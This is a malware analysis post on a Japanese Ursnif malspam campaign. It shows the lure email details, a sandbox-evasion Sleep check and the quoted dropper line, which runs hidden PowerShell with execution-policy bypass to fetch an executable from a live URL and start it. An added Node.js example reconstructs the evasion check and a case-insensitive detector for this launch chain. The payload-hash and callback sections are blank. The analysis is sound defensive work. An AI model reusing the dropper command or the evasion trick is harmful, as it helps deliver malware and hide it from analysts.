Quick Analysis of Japanese Ursnif Malspam Campaign

Malware Delivery Method

A .docx attachment in an email

Execution process

The attached .docx is opened -> the JavaScript embedded in it executes -> the script launches PowerShell, which connects to the internet -> PowerShell downloads the payload over HTTPS and runs it


The document was sent as an attachment in the following email:

Subject: =?iso-2022-jp?B?OBskQjduISI4NjJBQEE1YT1xJEckOSEjGyhC?= (the ISO-2022-JP encoded word decodes to "8月、原価請求書です。", roughly "August: here is the cost invoice.")
From: =?iso-2022-jp?B?GyRCQTBFRBsoQiAbJEJCc0thGyhC?= <[email protected]> (the display name decodes to a Japanese personal name with the surname 前田, "Maeda")
To: <[email protected]>
Original attachment name: 原価請求書です277253.docx (原価請求書です means "this is the cost invoice", the same wording as the subject line; it is not "copy of invoice")
MD5 hash: 85d09006634ab5f2138ac927997accda

Below are the unique sender email addresses observed in this Ursnif campaign, each delivering the malicious document as an email attachment:

[email protected]
[email protected]
[email protected]

And below are the spoofed From addresses:

[email protected]
[email protected]
[email protected]

The JavaScript embedded in the .docx performs the following tasks:

  • Detects Sleep short-circuiting, a sandbox technique in which the Sleep API is patched to return immediately so that a sample's delay loops finish instantly. The script takes a timestamp before and after calling Sleep and compares the elapsed wall-clock time with the delay it requested; if far less time passed, it concludes it is being analysed.

// Timestamps taken before and after the Sleep call (the call itself is not in this excerpt).
// piUCkfeTbuHWBQdaRl holds the name of the Date method to invoke, presumably "getTime";
// looking it up through a variable keeps the literal method name out of the script text.
TJoMcZPXpCNhHVlsn = new Date()[piUCkfeTbuHWBQdaRl]();
qWBKNMtLEHISpva = new Date()[piUCkfeTbuHWBQdaRl]();

  • If Sleep short-circuiting is not detected, the JavaScript runs PowerShell to download the payload over HTTPS and execute it, as shown below (typographic quotes in the page's rendering have been normalised to ASCII):

lhzYcTRDtUorLVmdP.ShellExecute("cmd.eXE", "/c ping localhost & powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('https://aedwards.co/wp-includes/IXR/get.php?jgTbz','%appdata%xJr23.eXe'); sTarT-PROcess '%appdAta%xJr23.exe'", "", "open", 0);

lhzYcTRDtUorLVmdP is presumably a Shell.Application object; the final argument 0 to ShellExecute hides the cmd.exe window. The leading "ping localhost" is a cheap delay of a few seconds before PowerShell starts. PowerShell is then launched with -executionpolicy bypass -noprofile -windowstyle hidden, fetches the payload with WebClient.DownloadFile, writes it as xJr23.eXe under %appdata% (the path separator between %appdata% and the file name appears to have been lost in the page's formatting) and runs it with Start-Process. The mixed case in "cmd.eXE" and "sTarT-PROcess" is a common trick against case-sensitive string matching; any detection rule written for this chain needs to be case-insensitive.
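The two steps above, reconstructed as an added example in plain Node.js (this is not code from the original post or from the malware): first the Sleep short-circuiting check with a real sleep and a sandbox-style no-op sleep side by side, then the PowerShell launch chain from the sample used as input to a small, case-insensitive command-line detector. Assumptions: the obfuscated variable piUCkfeTbuHWBQdaRl holds the string "getTime", Atomics.wait stands in for WScript.Sleep, and the process-creation records are constructed, not real telemetry.

```javascript
// Added example, not code from the original post. Reconstructs (1) the Sleep
// short-circuiting check and (2) a detector for the download-and-execute
// command line. Assumptions: piUCkfeTbuHWBQdaRl holds "getTime"; Atomics.wait
// stands in for WScript.Sleep; the log records below are constructed.

// ---- 1. Sleep short-circuiting check --------------------------------------

// The sample reads `new Date()[piUCkfeTbuHWBQdaRl]()`: a bracket lookup of a
// method name held in a variable, so the literal "getTime" never appears.
const piUCkfeTbuHWBQdaRl = "getTime";
function now() {
  return new Date()[piUCkfeTbuHWBQdaRl]();
}

// A real synchronous sleep, like WScript.Sleep(ms) under Windows Script Host.
// Atomics.wait blocks the Node.js main thread until the timeout expires.
function realSleep(ms) {
  Atomics.wait(new Int32Array(new SharedArrayBuffer(4)), 0, 0, ms);
}

// What a sandbox that short-circuits Sleep effectively installs: a no-op.
function patchedSleep(_ms) {}

// Timestamp, sleep, timestamp again. If much less wall-clock time passed than
// was requested, Sleep has been hooked and the script is being analysed.
function sleepWasShortCircuited(sleepFn, requestedMs) {
  const before = now();
  sleepFn(requestedMs);
  const after = now();
  return after - before < requestedMs / 2; // generous tolerance for jitter
}

// ---- 2. Detecting the launch chain ----------------------------------------

// The cmd.exe argument string from the sample, quotes normalised to ASCII.
const SAMPLE_CMDLINE =
  "/c ping localhost & powershell.exe -executionpolicy bypass -noprofile " +
  "-windowstyle hidden (new-object system.net.webclient).downloadfile(" +
  "'https://aedwards.co/wp-includes/IXR/get.php?jgTbz','%appdata%xJr23.eXe'); " +
  "sTarT-PROcess '%appdAta%xJr23.exe'";

// Each indicator alone is common in admin scripts; several together are not.
// All patterns are case-insensitive because the sample mixes case
// ("cmd.eXE", "sTarT-PROcess") to slip past case-sensitive string rules.
const INDICATORS = [
  /-executionpolicy\s+bypass/i,
  /-windowstyle\s+hidden/i,
  /downloadfile\s*\(/i,
  /%appdata%/i,
  /start-process/i,
];

function scoreCommandLine(cmdline) {
  return INDICATORS.filter((re) => re.test(cmdline)).length;
}

// A script host or Office application spawning a shell is the other strong
// signal: the dropper's ShellExecute call produces exactly that parent/child.
const SUSPICIOUS_PARENTS = new Set([
  "wscript.exe", "cscript.exe", "winword.exe", "excel.exe", "powerpnt.exe",
]);
const SHELLS = new Set(["cmd.exe", "powershell.exe"]);

// Flag an event when a suspicious parent spawns a shell, or when the command
// line alone scores at or above `threshold`.
function isSuspicious(event, threshold = 3) {
  const badSpawn =
    SUSPICIOUS_PARENTS.has(event.parent.toLowerCase()) &&
    SHELLS.has(event.image.toLowerCase());
  return badSpawn || scoreCommandLine(event.cmdline) >= threshold;
}

// Constructed records in the shape of process-creation telemetry (not real).
const SAMPLE_EVENTS = [
  { parent: "wscript.exe", image: "cmd.exe", cmdline: SAMPLE_CMDLINE },
  { parent: "explorer.exe", image: "powershell.exe",
    cmdline: "powershell.exe -NoProfile Get-ChildItem C:\\Users" },
  { parent: "services.exe", image: "cmd.exe", cmdline: "/c ping localhost" },
];

function flagSuspicious(events) {
  return events.filter((e) => isSuspicious(e));
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("no-op Sleep detected:", sleepWasShortCircuited(patchedSleep, 300));
  console.log("real Sleep detected: ", sleepWasShortCircuited(realSleep, 300));
  for (const e of flagSuspicious(SAMPLE_EVENTS)) {
    console.log(`suspicious: ${e.parent} -> ${e.image} (score ${scoreCommandLine(e.cmdline)})`);
  }
}
```

Run it with `node` and only the wscript.exe -> cmd.exe record is flagged; the benign PowerShell and ping commands score zero. The half-of-requested tolerance in sleepWasShortCircuited is the part to tune: a sandbox that slows Sleep instead of skipping it will not be caught by this check, which is also why the sample pairs it with the "ping localhost" delay.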


MD5 hash of the downloaded payload:


After execution, the downloaded payload performs the following network callback:


Interesting callback domain name:

antispam.city (how ironic)
WHOIS data shows that this domain was registered only recently, on 14 August 2017.